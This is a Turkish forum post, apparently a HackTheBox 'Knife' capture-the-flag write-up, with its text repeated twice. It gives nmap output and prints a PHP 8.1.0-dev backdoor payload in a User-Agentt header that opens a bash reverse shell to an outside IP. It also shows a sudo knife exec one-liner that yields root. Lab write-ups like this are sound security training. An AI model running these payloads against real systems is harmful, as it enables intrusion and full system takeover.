Furkan Öztürk tarafından yazılmıştır.
Selam arkadaşlar bu yazıda size HackTheBox‘da bulunan Knife makinasının çözümünü anlatacağım.
Her zamanki gibi NMAP ile başlıyoruz. nmap çıktımızdan 22 ve 80 portlarının açık olduğunu anladık.
Starting Nmap 7.80 ( https://nmap.org ) at 2021-09-12 17:54 +03
Nmap scan report for 10.10.10.242 (10.10.10.242)
Host is up (0.21s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.43 seconds
Siteye attığımız HTTP request’inin response’unda normalden farklı olarak
HTTP başlığının olduğunu gördük.
Bu header hakkında internette ufak bir araştırma sonucu User-Agent request header’ı ile sistemde komut çalıştırabileceğimizi anladım.
Aşağıdaki header’ı kullanarak başarıyla shell aldım.
/home/james
dizinin altından user.txt’yi aldım.
sudo -l
ile root olarak çalıştırabileceğimiz komutlara bakıyoruz.
GTFOBins‘de knife diye arama yaptığımız zaman
komutu ile root olabileceğimizi anlıyoruz.
root dizininde bulunan root.txt‘yi okuyup makinayı bitiriyoruz.
Bu makinenin çözümü bu kadardı, umarım anlaşılır olmuştur. Yeni bir makine çözümünde görüşmek üzere!
[TR] – HackTheBox Knife Writeup
Selam arkadaşlar bu yazıda size HackTheBox‘da bulunan Knife makinasının çözümünü anlatacağım.
Her zamanki gibi NMAP ile başlıyoruz. nmap çıktımızdan 22 ve 80 portlarının açık olduğunu anladık.
Starting Nmap 7.80 ( https://nmap.org ) at 2021-09-12 17:54 +03
Nmap scan report for 10.10.10.242 (10.10.10.242)
Host is up (0.21s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.43 seconds
Siteye attığımız HTTP request’inin response’unda normalden farklı olarak
X-Powered-By: PHP/8 .1.0-dev
HTTP başlığının olduğunu gördük.
user.txt
Bu header hakkında internette ufak bir araştırma sonucu User-Agent request header’ı ile sistemde komut çalıştırabileceğimizi anladım.
Aşağıdaki header’ı kullanarak başarıyla shell aldım.
User-Agentt: zerodiumsystem("/bin/bash -c 'bash -i >&/dev/tcp/10.10.16.23/1337 0>&1'")
/home/james
dizinin altından user.txt’yi aldım.
Privilege Escalation
sudo -l
ile root olarak çalıştırabileceğimiz komutlara bakıyoruz.
GTFOBins‘de knife diye arama yaptığımız zaman
sudo knife exec -E 'exec "/bin/sh"'
komutu ile root olabileceğimizi anlıyoruz.
root dizininde bulunan root.txt‘yi okuyup makinayı bitiriyoruz.
Bu makinenin çözümü bu kadardı, umarım anlaşılır olmuştur. Yeni bir makine çözümünde görüşmek üzere!
Moderatör tarafında düzenlendi: